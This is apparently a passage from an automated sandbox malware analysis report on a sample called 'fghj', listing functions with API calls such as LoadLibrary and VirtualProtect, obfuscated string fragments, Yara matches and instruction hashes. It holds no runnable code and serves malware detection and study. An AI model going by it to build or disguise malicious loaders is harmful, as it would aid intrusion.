                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                    • String ID: .dll
                                                                                                                                                                                                                    • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                    • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                    • Instruction ID: 3085919bb03e531d68a231a06a5b5cf9a31b7596f2839c23416168a387c6c8c2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9521E4716102858FE721EFA8C8C4B6A7BE4EF05329F1841EDDC428BA41D730EC498740
                                                                                                                                                                                                                    Function 00B4E9E8 Relevance: 3.0, APIs: 2, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1346 b4e9e8-b4ea15 call b50b0b call b50ba9 1351 b4ea17-b4ea25 VirtualProtect 1346->1351 1352 b4ea4b 1346->1352 1351->1352 1353 b4ea27-b4ea49 call b51179 VirtualProtect 1351->1353 1354 b4ea4d-b4ea50 1352->1354 1353->1354
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00B50B0B: LoadLibraryA.KERNEL32(00000000,?,?), ref: 00B50B9D
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 00B4EA20
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 00B4EA43
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 895956442-0
                                                                                                                                                                                                                    • Opcode ID: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
                                                                                                                                                                                                                    • Instruction ID: 996b3d48b47379395a4cea9cb96869c23e2dd10962b795d8d8a998652460f9a7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F081B2110614BEE611A664CC82FFB37ECEB49711F440498FF16D6080E6B1EA0996B1

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Function 00B13EF5 Relevance: 78.4, Strings: 61, Instructions: 2117COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: !$!$"$#$%$%$&$&$'$'$($($)$)$)$*$+$,$-$/$0$1$1$2$5$8$8$>$?$@$@$B$D$D$D$D$E$I$O$O$O$Q$Q$X$]$_$_$_$`$`$`$`$i$l$o$p$q$u$w$z$z
                                                                                                                                                                                                                    • API String ID: 0-4223306389
                                                                                                                                                                                                                    • Opcode ID: 3890bb4db51ad410a72e924302e9b5ec5b34e3da985793a2f72d822e123a2a89
                                                                                                                                                                                                                    • Instruction ID: 592f4c3149b94e2b663d839ffbb14671eefcb1e28b5c5ce2c4dc3a4cb3dadc67
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3890bb4db51ad410a72e924302e9b5ec5b34e3da985793a2f72d822e123a2a89
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9213AD7150C7C18AC3358B3888953DFBBE1ABD6324F598AADE4E9873D2D77488418B53
                                                                                                                                                                                                                    Function 00B3609B Relevance: 62.9, Strings: 50, Instructions: 363COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: $"$"$#$#$$$'$($*$*$*$,$.$1$4$6$8$8$9$:$>$A$B$E$G$J$L$Q$W$X$Z$[$[$_$`$c$c$d$d$f$l$m$m$n$n$p$q$r$v$~
                                                                                                                                                                                                                    • API String ID: 0-3593980817
                                                                                                                                                                                                                    • Opcode ID: 336ad24c0fead976a234a7cc69689f16e2cd558e21ff6dfd065e4a08ac84cfd9
                                                                                                                                                                                                                    • Instruction ID: afcba2eccc10ad300cfe9c14ffc3228f483916730b9f367eb59bfcc3473ca217
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 336ad24c0fead976a234a7cc69689f16e2cd558e21ff6dfd065e4a08ac84cfd9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 942211209087EA89DB32C73C8C587DDBFA15B27324F0843D9D4E96B2D2D7750A85CB66
                                                                                                                                                                                                                    Function 00B255E5 Relevance: 30.4, Strings: 24, Instructions: 419COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: "04$!j#l$,n_`$;zI|$<~Ip$D>C0$F:]<$GrDt$PfYx$QbRd$T2@4$UfSx$Y.J $Y6~H$\"O$$`R7T$hZh\$jk$l^nP$u&U8$uFsX$zJ|L$<>$|~
                                                                                                                                                                                                                    • API String ID: 0-1227251085
                                                                                                                                                                                                                    • Opcode ID: 89e3a4c6c8e580158efb4c17197ecf1b83ed33bd00be6b9e94d98b0a36575ae8
                                                                                                                                                                                                                    • Instruction ID: d3fe1e7d50e0150f9b62ef6472013b1b6e56899eb682ea1d6eacf0cdb53e8cfc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89e3a4c6c8e580158efb4c17197ecf1b83ed33bd00be6b9e94d98b0a36575ae8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0132FBB060C3D48AD334CF59D042B8FBAF2FB92300F40891DC5E96B656D7B1864A9B97
                                                                                                                                                                                                                    Function 003A5B70 Relevance: 16.7, APIs: 11, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(00000000,0000018C,?,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000,000001D0,000001D0), ref: 003A5B99
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?), ref: 003A5BA6
                                                                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,?,?,0000000A,0000018C,?,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003A5C36
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?), ref: 003A5C42
                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed), ref: 003A5C95
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?), ref: 003A5CA2
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed), ref: 003A5D19
                                                                                                                                                                                                                    • LockResource.KERNEL32(?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed), ref: 003A5D24
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?), ref: 003A5D2E
                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000,00000000,000001D0,000001D0), ref: 003A5DB4
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C), ref: 003A5DC9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$ErrorLast$FreeLibraryLoad$FindLockSizeof
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3462591719-0
                                                                                                                                                                                                                    • Opcode ID: 6cf6fd0791ec1306ffbc6ce5f2605202d11c2f0e9f84f15c5863f40c75164cca
                                                                                                                                                                                                                    • Instruction ID: 1a93b1474b3ea258502a6601af2158892d0b2449755efd833c7832079793335d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cf6fd0791ec1306ffbc6ce5f2605202d11c2f0e9f84f15c5863f40c75164cca
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F61ACB5620204BBDF0AFBB6DC5BDAE3A7DEF5B340F004129F502DA192EE7599448660
                                                                                                                                                                                                                    Function 00B1F8F5 Relevance: 14.6, Strings: 11, Instructions: 859COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: &0" $2)6 $=342$=Q^^$I2?8$Yz$aD4N$e$rmte$sD4N$wu~g
                                                                                                                                                                                                                    • API String ID: 0-1157038571
                                                                                                                                                                                                                    • Opcode ID: d9fd46ed380715bf220d02342fb719428f4c7fb6f61d62cf527223ce85d7dfa6
                                                                                                                                                                                                                    • Instruction ID: e5e359819ceef1da69ef5867643ba340f5fff9d3c1162ddc4f08d708d4cff9c0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9fd46ed380715bf220d02342fb719428f4c7fb6f61d62cf527223ce85d7dfa6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D35225715083958FC721DF24D84076EBBE2EFD6310F0886ACE8E95B392DB359906C792
                                                                                                                                                                                                                    Function 00B228B5 Relevance: 8.1, Strings: 6, Instructions: 561COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: !@$,$-$.$/$>
                                                                                                                                                                                                                    • API String ID: 0-287882502
                                                                                                                                                                                                                    • Opcode ID: cf19f83d45970e8620fc48b7023a2a9d2bf520ca8dc12e1cf1ca8289be2d71dc
                                                                                                                                                                                                                    • Instruction ID: e6f663546ed1a82108edef2ce06d3160bcf7086690221ac931ddace79a7b5900
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf19f83d45970e8620fc48b7023a2a9d2bf520ca8dc12e1cf1ca8289be2d71dc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E722D03150C7A08FD3248F2894953AFBBE1AB86324F194AADE5D9C73D2D6798845CB43
                                                                                                                                                                                                                    Function 00B21FD5 Relevance: 7.9, Strings: 6, Instructions: 415COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .S0U$3W>Y$>C)E$I/5Q$Icde$gK)M
                                                                                                                                                                                                                    • API String ID: 0-3316345126
                                                                                                                                                                                                                    • Opcode ID: 4af5d83895553d45601979b4567cc6a62415f89b2a79592c0e01c78599941761
                                                                                                                                                                                                                    • Instruction ID: ffd754986959df94d714361c65c4e7b87bfd2d03ebdaeaf2b327e9ff712f813a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4af5d83895553d45601979b4567cc6a62415f89b2a79592c0e01c78599941761
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98B102B15083209BD724DF24D86266BB7F1FFD6350F198A5CE9DA8B390E7399900CB46
                                                                                                                                                                                                                    Function 00B1E435 Relevance: 7.9, Strings: 6, Instructions: 389COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: BC$P$wh$pr$t*v$|~
                                                                                                                                                                                                                    • API String ID: 0-2068921225
                                                                                                                                                                                                                    • Opcode ID: d7ce41c6af378870f071cefbe2497e7834784d7017225703bd9058ba8bbb2727
                                                                                                                                                                                                                    • Instruction ID: cc537e0f2579ef043cc9d1d82436630a175803282dc7233cb02a9832891cf6f3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7ce41c6af378870f071cefbe2497e7834784d7017225703bd9058ba8bbb2727
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32B100B15083018BD720DF28C892AABB7F1EF92314F5889ACE8E59B390F735D945C756
                                                                                                                                                                                                                    Function 00B37445 Relevance: 7.8, Strings: 6, Instructions: 256COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: *$*$+$+$,$,
                                                                                                                                                                                                                    • API String ID: 0-423665535
                                                                                                                                                                                                                    • Opcode ID: 08fd3baebd715386d14a4854788fababafee1648addd8b934745a11d46aaee68
                                                                                                                                                                                                                    • Instruction ID: 1280261dd3f26a89dd54cc5a9ab3097cd7613638190859d4a3fb6fe11d73f3bd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08fd3baebd715386d14a4854788fababafee1648addd8b934745a11d46aaee68
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6991F66364C7D18AC325853C485565BEED24BE3134F2DCBADD8F69B3D2D525C80683A3
                                                                                                                                                                                                                    Function 00B1B765 Relevance: 7.4, Strings: 5, Instructions: 1184COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: I,~M$L !$o`$pr$tv
                                                                                                                                                                                                                    • API String ID: 0-893526404
                                                                                                                                                                                                                    • Opcode ID: 4ce505b89c1af04ac6ad5407cb6a86e854819c669a549d688737e1f1a330426d
                                                                                                                                                                                                                    • Instruction ID: a7c11f39ff90bd02b311f9c2985812ea76b651a7f3cfdbb08c5c443044891ff7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ce505b89c1af04ac6ad5407cb6a86e854819c669a549d688737e1f1a330426d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 578214746483409FE714CF24D885BABBBE2EBD6700FA4C8ACE5C597256DB31DC818B52
                                                                                                                                                                                                                    Function 00B0AF35 Relevance: 6.7, Strings: 5, Instructions: 430COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: DH$I}$n$us$us
                                                                                                                                                                                                                    • API String ID: 0-1813928229
                                                                                                                                                                                                                    • Opcode ID: 96023bdf6c313b5c6d50006df859692ebe05b97524a4c309529f993aa9b99c64
                                                                                                                                                                                                                    • Instruction ID: 691a48b664d0943346ecfc47daa1d1b406132f9444dad9f4ed00c2430fedd113
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96023bdf6c313b5c6d50006df859692ebe05b97524a4c309529f993aa9b99c64
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5D14671A483408FC314DF64C881AABBFE1FBD1304F18896CE9D59B391DB789909CB92
                                                                                                                                                                                                                    Function 00B2DF34 Relevance: 5.3, Strings: 4, Instructions: 283COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: >XVt$@A$hlZo$iUmZ
                                                                                                                                                                                                                    • API String ID: 0-436922151
                                                                                                                                                                                                                    • Opcode ID: 1a274ba9affa76d4e115d43027523d9b33005508ed0007c041ca63eacf175872
                                                                                                                                                                                                                    • Instruction ID: 760c2db47729effebb5ac763d85a49cc51a7897d5da81a801221a989f487ac68
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a274ba9affa76d4e115d43027523d9b33005508ed0007c041ca63eacf175872
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB814D7150C3E08BE3748B2698907AB7BD1DF96310F1949ADD4DD9B381DB758806C793
                                                                                                                                                                                                                    Function 00B2DFAC Relevance: 5.3, Strings: 4, Instructions: 280COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: >XVt$@A$hlZo$iUmZ
                                                                                                                                                                                                                    • API String ID: 0-436922151
                                                                                                                                                                                                                    • Opcode ID: f497bfd5aee755750b7c40d39889f52bd8f65bcd590ad5d197413e02625d0ece
                                                                                                                                                                                                                    • Instruction ID: b5caa8c4ae8822b1b07eb2fda73c1e49dc3a7184e2e1b8e6cb520f01b7ffa673
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f497bfd5aee755750b7c40d39889f52bd8f65bcd590ad5d197413e02625d0ece
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12814C7050C3E08BE3748B2698A07AB7BD1DF96310F1849ADD4DD9B381DB758806CB93
                                                                                                                                                                                                                    Function 00B2DFA7 Relevance: 5.3, Strings: 4, Instructions: 252COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: >XVt$@A$hlZo$iUmZ
                                                                                                                                                                                                                    • API String ID: 0-436922151
                                                                                                                                                                                                                    • Opcode ID: c48017bb1ba55d2966cd38a4871b451f0d6a31ec97ee146c3deefdb3d4b80fc2
                                                                                                                                                                                                                    • Instruction ID: 95fbad2e278e71772dda1bc7cc634febe7e1c3ee41e0e233e5b91694a2ac94f5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c48017bb1ba55d2966cd38a4871b451f0d6a31ec97ee146c3deefdb3d4b80fc2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF710A7150C3E08BE3748F2698907ABBBD2DF96210F1949ACD4D95B342DB7548068B93
                                                                                                                                                                                                                    Function 00B37D75 Relevance: 4.5, Strings: 3, Instructions: 793COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: C$zxyz$~&@v
                                                                                                                                                                                                                    • API String ID: 0-1637149356
                                                                                                                                                                                                                    • Opcode ID: e458bfb182dbd9059d0e79d735218f079b2678471523aa497ae56e4960a46c35
                                                                                                                                                                                                                    • Instruction ID: e56040e878917c5fd7a81ab4d5def99621169d48998850247a3a66544b753e43
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e458bfb182dbd9059d0e79d735218f079b2678471523aa497ae56e4960a46c35
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05422371A483518BD324CF28C88176BBBE1EFD5714F288A6DF9859B381DA34D805CB97
                                                                                                                                                                                                                    Function 00B0AAC5 Relevance: 4.2, Strings: 3, Instructions: 404COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ;${GA\;$7.
                                                                                                                                                                                                                    • API String ID: 0-3141673438
                                                                                                                                                                                                                    • Opcode ID: 2561060c7fd4c471339cdd8909a59a6559d67e96fd55faf9c3f182c0ae770455
                                                                                                                                                                                                                    • Instruction ID: a82775a278433f1505f4978e5e349cb05f3c59600c3c300486ee83b409e799e2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2561060c7fd4c471339cdd8909a59a6559d67e96fd55faf9c3f182c0ae770455
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72C10A72A0C3A14BC325CF25885035BFFE1EF96305F194AADE8D59B382D639C906C796
                                                                                                                                                                                                                    Function 00B23145 Relevance: 4.1, Strings: 3, Instructions: 329COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: A&[8$E:;<$V*W,
                                                                                                                                                                                                                    • API String ID: 0-4134244070
                                                                                                                                                                                                                    • Opcode ID: 9130073f4b39250c945160ae7c79fdf3d476be8a8ea9366fd54c3a1bd9d2e7d0
                                                                                                                                                                                                                    • Instruction ID: d87b83b9d668bd3f773b821879dd8e3bcbb7e283cb6fe9a53ee8edea0fae8dd4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9130073f4b39250c945160ae7c79fdf3d476be8a8ea9366fd54c3a1bd9d2e7d0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E9134702083109BD724DF64DC92B6B77F5EF81B24F14899CF9898B291E778DA05CB62
                                                                                                                                                                                                                    Function 00B17E40 Relevance: 4.0, Strings: 3, Instructions: 261COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
